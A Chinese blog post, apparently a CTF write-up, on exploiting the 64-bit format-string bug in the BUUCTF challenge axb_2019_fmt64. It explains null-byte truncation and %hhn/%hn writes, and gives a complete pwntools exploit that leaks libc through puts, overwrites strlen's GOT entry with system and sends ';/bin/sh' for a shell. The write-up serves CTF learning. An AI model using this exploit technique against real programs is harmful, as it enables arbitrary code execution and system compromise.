buu_64位fmPWN——axb_2019_fmt64(64位格式化字符串改got表)不使用fmstr工具包

于 2024-03-22 15:36:34 发布
阅读量317 收藏 10
点赞数 4
文章标签: linux 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ngztx/article/details/136942689
版权

输入偏移为8这里就不给大家演示了,下面介绍本题折磨我许久的几个点

背景:

64位\x00截断:

​    32位的泄露地址可以用整个payload :payload = p32(泄露地址) + %偏移$x 来构建,但是64位不行
如果这样写,前面的地址数据经p64()打包后占的是8个字节,我们send 的地址和我们构造的格式化字符串中间还有好多个 ‘00’ ,而在字符串中 ‘00’ 就代表了结束,所以在printf到‘00’时,就被认为字符串已经结束了,自然不会继续往后面printf了,也即是说我们的字符串都被’00’给截断了

payload=b'%9$saaaa'+p64(puts_got)#####先输入‘aaaa'避免0截断

难点1:

到这里为止,应该对%k$n有一定的了解了,还是那个原则,%k$n前面有多少个字节,那么就会向第k个参数地址中写多少

payload=b'%'+str(system_high-9).encode('utf-8')+b'c%12$hhn'+b'%'+str(system_low-
#############填入地址值大小的字节个数#############覆盖指定位置

system_high).encode('utf-8')+b'c%13$hn'
payload=payload.ljust(32,b'a')####初始偏移为8,填充为了凑整前面输入占4位偏移
payload+=p64(strlen_addr+2)+p64(strlen_addr)

str(system_high-9),str(system_low-system_high)以及程序自带的9个字节为输出的内容,%hhn不算

到这里为止,应该对%k$n有一定的了解了,还是那个原则,%k$n前面有多少个字节,那么就会向第k个参数地址中写多少

难点2:写入地址的计算看下图:

好好说话之格式化字符串漏洞利用_利用格式化字符串漏洞修改变量值-CSDN博客

插入hollk师傅的文章

难点3:分别计算高地址和低地址

[BUUCTF-axb_2019_fmt64 - -ro0t - 博客园 (cnblogs.com)](https://www.cnblogs.com/sakura-zz/articles/16266299.html) 再次插入大师傅的文章

只有后面3字节不同,截取倒数第三字节和后两字节进行修改

system_addr=libc_base+libc.symbols['system']
system_low=system_addr &0xffff
#################与运算(对于0xffff而言)的目的就是保留低字节的内容,而删去高字节。
system_high=system_addr >>16 &0xff########右移十六位高字节到低字节

exp:

from pwn import * 
from LibcSearcher import LibcSearcher

context(log_level='debug',arch='amd64',os='linux')

io = process('./axb_2019_fmt64')
#io=remote("node5.buuoj.cn",27306)
elf = ELF("./axb_2019_fmt64")
libc=elf.libc
#libc=ELF('/home/ctfshow/Desktop/libc-2.23.so')

def debug():
	gdb.attach(io)
	pause()
	
puts_got = elf.got['puts']
sprintf_got = elf.got["sprintf"]
strlen_addr = elf.got["strlen"]
print(hex(puts_got))

io.recvuntil(b'Please tell me:')
payload=b'%9$saaaa'+p64(puts_got)

io.send(payload)
io.recvuntil(b'Repeater:')
puts_addr=u64(io.recv(6).ljust(8,b'\x00'))
log.success('puts_addr{}'.format(hex(puts_addr)))

#libc=LibcSearcher('puts',puts_addr)
#libc_base=puts_addr-libc.dump('puts')
libc_base=puts_addr-libc.symbols['puts']
log.success('libc_base{}'.format(hex(libc_base)))

#system_addr=libc_base+libc.dump('system')
system_addr=libc_base+libc.symbols['system']
system_low=system_addr &0xffff
system_high=system_addr >>16 &0xff
log.success('system_addr{}'.format(hex(system_addr)))
log.success('system_low{}'.format(hex(system_low)))
log.success('system_hign{}'.format(hex(system_high)))


payload=b'%'+str(system_high-9).encode('utf-8')+b'c%12$hhn'+b'%'+str(system_low-system_high).encode('utf-8')+b'c%13$hn'
payload=payload.ljust(32,b'a')
payload+=p64(strlen_addr+2)+p64(strlen_addr)
debug()
io.send(payload)
#payload2 = "%" + str(high_sys - 9) + "c%12$hhn" + "%" + str(low_sys - high_sys) + "c%13$hn"

io.recvuntil(b'Please tell me:')
payload=b';/bin/sh\x00'
io.send(payload)



io.interactive()

ngztx
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【Pwn】2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1028
出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
axb_2019_fmt64
z1r0的博客
01-11 1679
axb_2019_fmt64 查看保护
BUUCTF之“axb_2019_fmt64
Probeginner的博客
12-15 3250
64位格式化字符串漏洞,内存地址任意写
[BUUCTF-pwn]——axb_2019_fmt64
Y_peak的博客
03-09 405
[BUUCTF-pwn]——axb_2019_fmt64 题目地址:(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64] 这是一道格式化字符串漏洞利用的题目 checksec 一看,竟然连canary都没开,不过开不开好像都木有什么用。 在IDA中看看,可以看出明显的字符串漏洞 首先当然是计算偏移了,发送aaaa%4$x, 比较习惯发送这个hhhh。发现距离栈顶是3,还有五个寄
axb-2019-fmt64
Stella_Leo的博客
08-24 679
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
cipher_CIPHER_
09-29
"Hi3520D"则可能是一个芯片型号,通常用于处理视频编码、解码或者安全功能,这与Cipher的使用紧密相关,因为硬件级别的加密能力对于高性能和低延迟的应用场景至关重要。 在IT领域,Cipher(加密器)是指用于执行...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
python无序链删除重复项的方法
12-23
在遍历链的过程中,使用了常数个额外的指针变量来保存当前遍历的结点,前驱结点和被删除的结点,所以空间复杂度为O(1) #!/usr/bin/env python3 # -*- coding: utf-8 -*- # @Time : 2020/1/15 20:55 # @Author : ...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
这可以通过使用WASM解析工具如`wasm2wat`或` Binaryen`来完成,将二进制WASM转换为更易读的Wat(WebAssembly Text Format)格式。 2. 理解函数逻辑:WASM中的函数由操作码(opcodes)组成,这些操作码对应于基本的...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
1. **解析WASM模块**:使用WABT或其他工具将`test.wasm`转换成人类可读的文本格式,例如Wat。 2. **理解控制流**:识别函数的入口和出口,理解基本块之间的跳转关系。 3. **分析操作码**:理解WASM指令集,识别...
POSN:POSN-BUU的源代码
04-01
8. **编译与构建工具**:项目可能使用Makefile或CMakeLists.txt来自动化编译和构建过程,确保不同平台上的可移植性。 9. **调试与测试**:源代码中可能包含断点、日志记录(如`std::cout`或使用Glog)、单元测试等...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2577
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
[BUUCTF]PWN——axb_2019_fmt6464位格式化字符串got
mcmuyanga的博客
01-27 2555
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1269
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 339
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接got,我选择的是printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
buu base64解码工具
08-23
根据提供的引用内容,我可以回答您的问题。buu base64解码工具是一种用于解码base64编码的工具。在base64编码中,原始数据以ASCII码形式转换为二进制顺序排列,并按照6个bit为一个间隔重新划分。接下来,根据base64编码将重新划分的数据翻译成base64编码形式的数据。而buu base64解码工具可以将经过base64编码的字符串解码为原始数据。这个工具适用于常见的base64隐写题,其中包含多个经过base64编码的字符串。解密规则是提取所有被修过的base64字符串结尾的二进制值,组成一个二进制串,以8位分割并转为十进制值,最终得到对应的ASCII字符串作为base64隐写的结果。因为解码时会舍弃添加的0字符,所以在添加的二进制值中可以不全为0,但不会影响解码结果。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [base64编解码的学习与例题](https://blog.csdn.net/alice60000/article/details/128892826)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[MISC]Base64隐写](https://blog.csdn.net/Sanctuary1307/article/details/113836907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值